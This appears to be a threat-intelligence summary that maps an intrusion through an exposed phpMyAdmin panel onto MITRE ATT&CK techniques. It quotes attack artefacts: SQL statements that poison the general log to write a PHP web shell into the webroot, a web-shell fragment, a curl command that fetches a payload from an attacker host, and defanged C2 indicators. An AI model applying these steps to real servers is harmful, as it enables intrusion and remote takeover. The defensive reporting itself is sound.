Chinese Attackers Abuse phpMyAdmin

MITRE Techniques

• [T1190] Exploit Public-Facing Application – Attacker accessed an exposed phpMyAdmin instance and abused default configuration to gain access (“initial point of entry was via the phpMyAdmin panel”).
• [T1059] Command and Scripting Interpreter – The actor executed commands via a PHP web shell that evaluated POST input (“name=$name); … $_REQUEST[1] ?>”).
• [T1505] Server Software Component – Log Poisoning/Injection to write and execute a .php file in the webroot by setting general_log_file to ‘../../htdocs/123.php’ and enabling general_log (“SET GLOBAL general_log_file = ‘../../htdocs/123.php’; SET GLOBAL general_log = ‘ON’;”).
• [T1105] Ingress Tool Transfer – Downloaded Nezha agent and payloads (curl -O live.exe https://rism.pages[.]dev/microsoft.exe) onto the compromised host via AntSword virtual terminal.
• [T1218] System Binary Proxy Execution – Malware used a renamed system binary (rundll32.exe as SQLlite.exe) to load malicious DLL (32138546.dll) for execution and persistence.
• [T1543] Create or Modify System Process – Malware created a service named “SQLlite” and placed a misspelled binary in System32 to achieve persistence (“creation of a persistence mechanism using a service named ‘SQLlite’”).
• [T1071] Application Layer Protocol – Ghost RAT communicated with C2 domains (gd.bj2[.]xyz) and IPs (45.207.220[.]12) for command and control activity (“connection to 45.207.220[.]12 … gd.bj2[.]xyz”).
• [T1027] Obfuscated Files or Information – Ghost RAT stages stored and reversed embedded executables and patched a config into the final payload (stage 2 reverses bytes and patches config into embedded PE).